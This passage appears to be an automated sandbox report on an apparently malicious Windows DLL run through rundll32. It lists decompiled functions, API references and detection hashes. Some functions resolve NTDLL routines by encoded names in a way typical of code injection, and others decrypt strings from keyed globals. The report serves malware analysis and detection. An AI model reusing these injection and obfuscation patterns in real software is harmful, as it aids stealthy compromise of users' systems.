				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xe8a38c; // 0x5499ba0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00E84E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xe891ac;
				}
				_t46 = E00E842F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00E86837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xe8a2d4; // 0x460d5a8
						_t16 = _t75 + 0xe8baa8; // 0x530025
						 *0xe8a138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00E84E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xe891b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00E86837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00E850CA(_v20);
						} else {
							_t66 =  *0xe8a2d4; // 0x460d5a8
							_t31 = _t66 + 0xe8bbc8; // 0x73006d
							 *0xe8a138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00E850CA(_v12);
				}
				return _v24;
			}

0x00e8592f
0x00e85935
0x00e8593c
0x00e85942
0x00e85946
0x00e8594a
0x00e8594d
0x00e85954
0x00e85957
0x00e85959
0x00e85959
0x00e85962
0x00e85969
0x00e8596c
0x00e85972
0x00e8597c
0x00e85985
0x00e8598c
0x00e859a5
0x00e859ac
0x00e859af
0x00e859b8
0x00e859c1
0x00e859d2
0x00e859db
0x00e859df
0x00e859e3
0x00e859ea
0x00e859ed
0x00e859ef
0x00e859ef
0x00e859f9
0x00e85a02
0x00e85a09
0x00e85a21
0x00e85a25
0x00e85a62
0x00e85a27
0x00e85a2a
0x00e85a32
0x00e85a43
0x00e85a4f
0x00e85a57
0x00e85a5b
0x00e85a5b
0x00e85a25
0x00e85a6a
0x00e85a6f
0x00e85a76

APIs

GetTickCount.KERNEL32 ref: 00E8593C
lstrlen.KERNEL32(?,80000002,00000005), ref: 00E8597C
lstrlen.KERNEL32(00000000), ref: 00E85985
lstrlen.KERNEL32(00000000), ref: 00E8598C
lstrlenW.KERNEL32(80000002), ref: 00E85999
lstrlen.KERNEL32(?,00000004), ref: 00E859F9
lstrlen.KERNEL32(?), ref: 00E85A02
lstrlen.KERNEL32(?), ref: 00E85A09
lstrlenW.KERNEL32(?), ref: 00E85A10

Part of subcall function 00E850CA: RtlFreeHeap.NTDLL(00000000,00000000,00E84239,00000000,00000001,?,00000000,?,?,?,00E86B8D,00000000,?,00000001), ref: 00E850D6

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 497e238c9dfba4d7041e00a1884f35e2261dcf4cf174a4f86d2522c80c4ee763
Instruction ID: e665f3ac0f2f024345516acc325ff8ae8ffbbd96eaa8a4f8f02bf5011e03e71b
Opcode Fuzzy Hash: 497e238c9dfba4d7041e00a1884f35e2261dcf4cf174a4f86d2522c80c4ee763
Instruction Fuzzy Hash: AE4138B2C00219EFCF11AFA5CD4999E7BB5EF48314F0500A1ED0CB7222DB359A14EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6CAB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

Replicator::operator[].LIBVCRUNTIME ref: 6E1E6CE8
DName::operator=.LIBVCRUNTIME ref: 6E1E6D3A

Strings

@, xrefs: 6E1E6E50

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: @
API String ID: 3211817929-2766056989
Opcode ID: f71722a692f399dd7c0ff20a3e030661972237ea74b9870508ffeb3ba06f9ec4
Instruction ID: 9a105a91498530e5bd3bd6211e03abfca53384682c53e39244271f5a457e5b0c
Opcode Fuzzy Hash: f71722a692f399dd7c0ff20a3e030661972237ea74b9870508ffeb3ba06f9ec4
Instruction Fuzzy Hash: 5861C571D10A099FDB04CFD4C855BEEBBB9AF19314F644029F612A76C0DB349A85DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E2831, Relevance: 10.7, APIs: 7, Instructions: 151COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6E1E28BF
DName::operator+.LIBCMT ref: 6E1E2912

Part of subcall function 6E1E148F: shared_ptr.LIBCMT ref: 6E1E14AB

Part of subcall function 6E1E137E: DName::operator+.LIBCMT ref: 6E1E139F

DName::operator+.LIBCMT ref: 6E1E2903
DName::operator+.LIBCMT ref: 6E1E2963
DName::operator+.LIBCMT ref: 6E1E2970
DName::operator+.LIBCMT ref: 6E1E29B7
DName::operator+.LIBCMT ref: 6E1E29C4

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: 4dd7daa0efdb9891f4b84cf25c3284c6e6a5fe6c4f7a41294a1dfebf80b7b5a2
Instruction ID: 8d2486d05f3ac00037abbd405c9c6e656738b531f9db7b9bdc3a788d6400a1dd
Opcode Fuzzy Hash: 4dd7daa0efdb9891f4b84cf25c3284c6e6a5fe6c4f7a41294a1dfebf80b7b5a2
Instruction Fuzzy Hash: 71517472E00619AFDB05CBD4D861EEEBBFCAF18710F10445AF506A7680DB7496C8DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E3B4F, Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6E1E3B77
DName::DName.LIBVCRUNTIME ref: 6E1E3BA4

Part of subcall function 6E1E1130: __aulldvrm.LIBCMT ref: 6E1E1161

DName::operator+.LIBCMT ref: 6E1E3BBF
DName::DName.LIBVCRUNTIME ref: 6E1E3BDC
DName::DName.LIBVCRUNTIME ref: 6E1E3C0C
DName::DName.LIBVCRUNTIME ref: 6E1E3C16
DName::DName.LIBVCRUNTIME ref: 6E1E3C3D

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: df75531a85de05de552e645bd18ffe135b8f2567ab956df58cc9ee93b84110cf
Instruction ID: 83ac942fea49b576fc3017341b079c8d2140259dc8a47c132120922fa01dbf2c
Opcode Fuzzy Hash: df75531a85de05de552e645bd18ffe135b8f2567ab956df58cc9ee93b84110cf
Instruction Fuzzy Hash: CF3109319049089ECF08CBE8C85AAED77B5BF15314F50445DF0536BAA0DB359AC7EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00E873C3, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E873C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xe8a2c8; // 0xbd092303
				_t1 =  &_a4; // 0xe830e1
				_t32 =  *_t1;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0xe8a2d4; // 0x460d5a8
				_t3 = _t8 + 0xe8b8a2; // 0x61636f4c
				_t25 = 0;
				_t30 = E00E82DEA(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xe8a2f8, 1, 0, _t30);
					E00E850CA(_t30);
				}
				_t12 =  *0xe8a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E00E8513E() == 0) {
						_t28 =  *0xe8a120( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E00E86BE1(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E00E851A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x00e873c4
0x00e873cb
0x00e873cb
0x00e873d5
0x00e873d9
0x00e873df
0x00e873ec
0x00e873f3
0x00e873f7
0x00e87409
0x00e8740b
0x00e8740b
0x00e87410
0x00e87417
0x00e87422
0x00e87438
0x00e8743c
0x00e8743e
0x00e87443
0x00e87443
0x00e87450
0x00e87454
0x00e87458
0x00000000
0x00000000
0x00e87466
0x00e8746a
0x00000000
0x00000000
0x00e8746a
0x00e87454
0x00000000
0x00e8746c
0x00e8746c
0x00e8746c
0x00e87472
0x00e87474
0x00e87474
0x00e8747e
0x00e87482
0x00e87494
0x00e87494
0x00e87498
0x00e8749e
0x00e8749e
0x00e874a1
0x00e874a3
0x00e874a6
0x00e874a6
0x00e874ad
0x00e874b3
0x00e874b3

APIs

Part of subcall function 00E82DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,05499C98,7742C740,00E855DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,00E855DE), ref: 00E82E20
Part of subcall function 00E82DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 00E82E44
Part of subcall function 00E82DEA: lstrcat.KERNEL32(00000000,00000000), ref: 00E82E4C

CreateEventA.KERNEL32(00E8A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00E830E1,?,?,?), ref: 00E87402

Part of subcall function 00E850CA: RtlFreeHeap.NTDLL(00000000,00000000,00E84239,00000000,00000001,?,00000000,?,?,?,00E86B8D,00000000,?,00000001), ref: 00E850D6

WaitForSingleObject.KERNEL32(00000000,00004E20,0,00000000,?,00000000,?,00E830E1,?,?,?,?,?,?,?,00E8211B), ref: 00E87460
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00E830E1,?,?,?), ref: 00E8748E
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00E830E1,?,?,?), ref: 00E874A6

Strings

x, xrefs: 00E87432
0, xrefs: 00E873CB, 00E8742F, 00E87446

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID: 0$x
API String ID: 73268831-645521696
Opcode ID: b5185d62a45bf1a83e0cc95d4cd4da7987d7150e77cadd896f2aaed23ea06f3a
Instruction ID: f68b623ed3fbbc2b1a0fd23bc9f215fdae5fb5c6396da23280dbe7896f2ad42d
Opcode Fuzzy Hash: b5185d62a45bf1a83e0cc95d4cd4da7987d7150e77cadd896f2aaed23ea06f3a
Instruction Fuzzy Hash: C22129325057225FD7317B698C44B6BBBE8AF44714F292225FD9DBB261DB70DC048750

Uniqueness

Uniqueness Score: -1.00%

Function 6E20324C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E203251
34 n, xrefs: 6E20329D

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID:
String ID: 34 n$C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2097232214
Opcode ID: 67dd7151efb1c4f56333748917ac2c3c2949b8567ec6ecbfad3b39967095c1f1
Instruction ID: 74d8c2729b5c8fb23c4cca9227cb1d85febd437c07d4a357403638a91b01a5eb
Opcode Fuzzy Hash: 67dd7151efb1c4f56333748917ac2c3c2949b8567ec6ecbfad3b39967095c1f1
Instruction Fuzzy Hash: C821927161460EBFD7109FE68C88D5A77AEBF027697044A15E928971D0EB30DC518BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E209D6E, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E209A59: _free.LIBCMT ref: 6E209A7E

_free.LIBCMT ref: 6E209DBC

Part of subcall function 6E1FD7F5: HeapFree.KERNEL32(00000000,00000000,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?), ref: 6E1FD80B
Part of subcall function 6E1FD7F5: GetLastError.KERNEL32(?,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?,?), ref: 6E1FD81D

_free.LIBCMT ref: 6E209DC7
_free.LIBCMT ref: 6E209DD2
_free.LIBCMT ref: 6E209E26
_free.LIBCMT ref: 6E209E31
_free.LIBCMT ref: 6E209E3C
_free.LIBCMT ref: 6E209E47

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7ac9138cef5ce3a258dca3bbd8fd3fddd9dd8b90217114defab4aa152b3db568
Instruction ID: 83f7ac5edc5f332bb60d81018a932c8f641404aeaa0a6128b3f6e3a98320e0cf
Opcode Fuzzy Hash: 7ac9138cef5ce3a258dca3bbd8fd3fddd9dd8b90217114defab4aa152b3db568
Instruction Fuzzy Hash: 1B118131A40B08EBD731E7F0CC45FDB77DD5F80708F800C15A29A6E090EB68B5566A90

Uniqueness

Uniqueness Score: -1.00%

Function 6E20D915, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6E20D95D
__fassign.LIBCMT ref: 6E20DB3C
__fassign.LIBCMT ref: 6E20DB59
WriteFile.KERNEL32(?,6E2055A5,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E20DBA1
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E20DBE1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E20DC8D

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 0e2f82da9f9f5d9d4dec3d7430d43cf27718a9d6af51f008ecfda3a32669b15e
Instruction ID: b44095bfbf41d66d501e5937aa7e276b2e5fc5551638cda2597e0397992dfffd
Opcode Fuzzy Hash: 0e2f82da9f9f5d9d4dec3d7430d43cf27718a9d6af51f008ecfda3a32669b15e
Instruction Fuzzy Hash: 05D17A75D0125D9FCB11CFE8C880AEDBBB6BF49314F24016AE855BB281D631AA46CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F1545, Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6E1F16CD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1F16E9
__allrem.LIBCMT ref: 6E1F1700
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1F171E
__allrem.LIBCMT ref: 6E1F1735
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1F1753

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 043adf15f1920c78ca3499397aa1f2aa39dfe4a67477a4671773f39f52257892
Instruction ID: 30a1a6366314fb022008bee8427f98c02abbd4cca6c959791ff4e79c06ab10cb
Opcode Fuzzy Hash: 043adf15f1920c78ca3499397aa1f2aa39dfe4a67477a4671773f39f52257892
Instruction Fuzzy Hash: B58107F1B00B06DBE310DEE9CC40B9A73E9AF45724F244A29E515D7292E770D98A9BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F2AC0, Relevance: 9.2, APIs: 6, Instructions: 221COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1F2B50
_free.LIBCMT ref: 6E1F2B6B
_free.LIBCMT ref: 6E1F2B76
_free.LIBCMT ref: 6E1F2C83

Part of subcall function 6E1FD792: RtlAllocateHeap.NTDLL(00000008,6E21B004,00000000), ref: 6E1FD7D3

_free.LIBCMT ref: 6E1F2C58

Part of subcall function 6E1FD7F5: HeapFree.KERNEL32(00000000,00000000,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?), ref: 6E1FD80B
Part of subcall function 6E1FD7F5: GetLastError.KERNEL32(?,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?,?), ref: 6E1FD81D

_free.LIBCMT ref: 6E1F2C79

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$Heap$AllocateErrorFreeLast
String ID:
API String ID: 4150789928-0
Opcode ID: ccc8d3ec838193c78c771c4bcab5de21272ab61c03a0da9c870d3a9283efdbbb
Instruction ID: 9efb5e8c4b05c4381178bdeb075e31bdedfe6876d37b1b63a8b1c50b80df2b12
Opcode Fuzzy Hash: ccc8d3ec838193c78c771c4bcab5de21272ab61c03a0da9c870d3a9283efdbbb
Instruction Fuzzy Hash: 3E517A3AA04241DBDB04DFE88850BFA77FDEF85728B640499EC45DB244EA319983E6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00E82902, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00E8295E
SysAllocString.OLEAUT32(0070006F), ref: 00E82972
SysAllocString.OLEAUT32(00000000), ref: 00E82984
SysFreeString.OLEAUT32(00000000), ref: 00E829E8
SysFreeString.OLEAUT32(00000000), ref: 00E829F7
SysFreeString.OLEAUT32(00000000), ref: 00E82A02

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: e50d258070e6b6b41d97732b829e799dd03289b61161865897820a1286a96093
Instruction ID: 74ec841801c7ab81fb1aa013b8f3e2c3c70869171f83fa3684710c17a845bf09
Opcode Fuzzy Hash: e50d258070e6b6b41d97732b829e799dd03289b61161865897820a1286a96093
Instruction Fuzzy Hash: 4E314E32D00609AFDB02EFA8C845A9EB7B6AF49314F144469EE18FB161DB719D05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6B55, Relevance: 9.1, APIs: 6, Instructions: 120COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 6E1E6B99
DName::operator+.LIBCMT ref: 6E1E6BA5

Part of subcall function 6E1E148F: shared_ptr.LIBCMT ref: 6E1E14AB

DName::operator+=.LIBCMT ref: 6E1E6C65

Part of subcall function 6E1E5561: DName::operator+.LIBCMT ref: 6E1E55CC
Part of subcall function 6E1E5561: DName::operator+.LIBCMT ref: 6E1E588A

Part of subcall function 6E1E137E: DName::operator+.LIBCMT ref: 6E1E139F

DName::operator+.LIBCMT ref: 6E1E6C20

Part of subcall function 6E1E14E7: DName::operator=.LIBVCRUNTIME ref: 6E1E1508

DName::DName.LIBVCRUNTIME ref: 6E1E6C89
DName::operator+.LIBCMT ref: 6E1E6C95

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID:
API String ID: 2795783184-0
Opcode ID: dda557eb39ae9737f075d461ffbc7dc93224c0d42b82fa4155709cd18cafebe3
Instruction ID: 45c1c72b0d11c23c030876b7e1348185c7dbc84caa8a06a61230720fd9a7f72a
Opcode Fuzzy Hash: dda557eb39ae9737f075d461ffbc7dc93224c0d42b82fa4155709cd18cafebe3
Instruction Fuzzy Hash: C14188B1610A4C6FDB04CFE4C455BEE7BFAEB06704F904458F286DBA80DB346A85DB54

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5913, Relevance: 9.1, APIs: 6, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6E1E6CAB: Replicator::operator[].LIBVCRUNTIME ref: 6E1E6CE8

DName::operator=.LIBVCRUNTIME ref: 6E1E59B9

Part of subcall function 6E1E5561: DName::operator+.LIBCMT ref: 6E1E55CC
Part of subcall function 6E1E5561: DName::operator+.LIBCMT ref: 6E1E588A

DName::operator+.LIBCMT ref: 6E1E5974
DName::operator+.LIBCMT ref: 6E1E5980
DName::DName.LIBVCRUNTIME ref: 6E1E59CD
DName::operator+.LIBCMT ref: 6E1E59DC
DName::operator+.LIBCMT ref: 6E1E59E8

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: 1b7ce43763d1f921b52ce42203329403da7313bd5873e0b8ce73d96976073094
Instruction ID: 6b1006709a4578b5a7abc73f559166a72a9da5d323af00ee6af1b2e3621b258b
Opcode Fuzzy Hash: 1b7ce43763d1f921b52ce42203329403da7313bd5873e0b8ce73d96976073094
Instruction Fuzzy Hash: CC318DB1604A059FCB08CFD8C891AEEBBF9AF59710F10485DF68797B80DB349684DB24

Uniqueness

Uniqueness Score: -1.00%

Function 00E84F5A, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E84F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00E86837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xe8a2d4; // 0x460d5a8
					_t1 = _t23 + 0xe8b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xe8a2d4; // 0x460d5a8
					_t2 = _t26 + 0xe8b792; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00E850CA(_t54);
					} else {
						_t30 =  *0xe8a2d4; // 0x460d5a8
						_t5 = _t30 + 0xe8b77f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xe8a2d4; // 0x460d5a8
							_t7 = _t33 + 0xe8b74e; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xe8a2d4; // 0x460d5a8
								_t9 = _t36 + 0xe8b72e; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xe8a2d4; // 0x460d5a8
									_t11 = _t39 + 0xe8b7a2; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00E84248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00e84f69
0x00e84f6d
0x00e8502f
0x00e84f73
0x00e84f73
0x00e84f78
0x00e84f8b
0x00e84f8d
0x00e84f92
0x00e84f9a
0x00e84fa1
0x00e84fa5
0x00e84fa8
0x00e85027
0x00e85028
0x00e84faa
0x00e84faa
0x00e84faf
0x00e84fb7
0x00e84fbb
0x00e84fbe
0x00000000
0x00e84fc0
0x00e84fc0
0x00e84fc5
0x00e84fcd
0x00e84fd1
0x00e84fd4
0x00000000
0x00e84fd6
0x00e84fd6
0x00e84fdb
0x00e84fe3
0x00e84fe7
0x00e84fea
0x00000000
0x00e84fec
0x00e84fec
0x00e84ff1
0x00e84ff9
0x00e84ffd
0x00e85000
0x00000000
0x00e85002
0x00e85008
0x00e8500d
0x00e85014
0x00e8501b
0x00e8501e
0x00000000
0x00e85020
0x00e85023
0x00e85023
0x00e8501e
0x00e85000
0x00e84fea
0x00e84fd4
0x00e84fbe
0x00e84fa8
0x00e8503d

APIs

Part of subcall function 00E86837: RtlAllocateHeap.NTDLL(00000000,00000000,00E84197), ref: 00E86843

GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,00E851C4,?,?,?,?,00000000,00000000), ref: 00E84F7F
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00E84FA1
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00E84FB7
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00E84FCD
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00E84FE3
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00E84FF9

Part of subcall function 00E84248: memset.NTDLL ref: 00E842C7

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: be1f3f6e8f3ac356e08139565415d6fa708567b104deff745dc3362766ef0185
Instruction ID: 2c1adcc439397441337f111065c435ee7439050cdede4e222ccbb322d23cb178
Opcode Fuzzy Hash: be1f3f6e8f3ac356e08139565415d6fa708567b104deff745dc3362766ef0185
Instruction Fuzzy Hash: 532182B260074A9FD761EF69DD44E6A77ECEB08348B045566F40DE7222D736E908CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DFB0C, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6E1DF8E3,6E1DE4FE,6E1DDCB2), ref: 6E1DFB1A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E1DFB28
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E1DFB41
SetLastError.KERNEL32(00000000,?,6E1DF8E3,6E1DE4FE,6E1DDCB2), ref: 6E1DFB93

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
